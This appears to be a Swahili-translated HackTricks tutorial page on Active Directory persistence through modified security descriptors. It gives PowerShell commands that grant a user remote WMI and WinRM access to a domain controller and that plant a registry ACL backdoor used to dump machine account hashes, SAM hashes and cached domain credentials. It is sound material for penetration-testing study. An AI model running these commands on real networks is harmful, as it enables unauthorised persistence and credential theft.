Security Descriptors

Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa katika HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi wa PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Vielelezo vya Usalama

Kutoka kwenye nyaraka: Lugha ya Ufafanuzi wa Vielelezo vya Usalama (SDDL) inafafanua muundo unaotumiwa kuelezea vielelezo vya usalama. SDDL hutumia vifungu vya ACE kwa DACL na SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Vielelezo vya usalama hutumiwa kuhifadhi ruhusa ambazo kifaa kina juu ya kifaa kingine. Ikiwa unaweza tu kufanya mabadiliko kidogo kwenye ielekezi ya usalama ya kifaa, unaweza kupata ruhusa za kuvutia sana juu ya kifaa hicho bila kuwa mwanachama wa kikundi cha wanao na madaraka.

Kwa hiyo, mbinu hii ya kudumu inategemea uwezo wa kupata kila ruhusa inayohitajika dhidi ya vitu fulani, ili kuweza kutekeleza kazi ambayo kawaida inahitaji madaraka ya msimamizi lakini bila haja ya kuwa msimamizi.

Upatikanaji wa WMI

Unaweza kumpa mtumiaji upatikanaji wa kutekeleza WMI kwa mbali kwa kutumia hii:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Upatikanaji wa WinRM

Toa upatikanaji wa konsoli ya winrm PS kwa mtumiaji kwa kutumia hii:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Upatikanaji wa mbegu za siri kwa njia ya kijijini

Fikia registry na pata mbegu za siri kwa kuunda mlango wa nyuma wa Reg kwa kutumia DAMP, ili uweze wakati wowote kupata mbegu ya kompyuta, SAM na vyeti vya AD vilivyohifadhiwa kwenye kompyuta. Hivyo, ni muhimu sana kumpa idhini hii kwa mtumiaji wa kawaida dhidi ya kompyuta ya Domain Controller:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Angalia Tiketi za Fedha ili kujifunza jinsi unavyoweza kutumia hash ya akaunti ya kompyuta ya Domain Controller.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

PreviousResource-based Constrained Delegation NextSID-History Injection

Last updated 2 months ago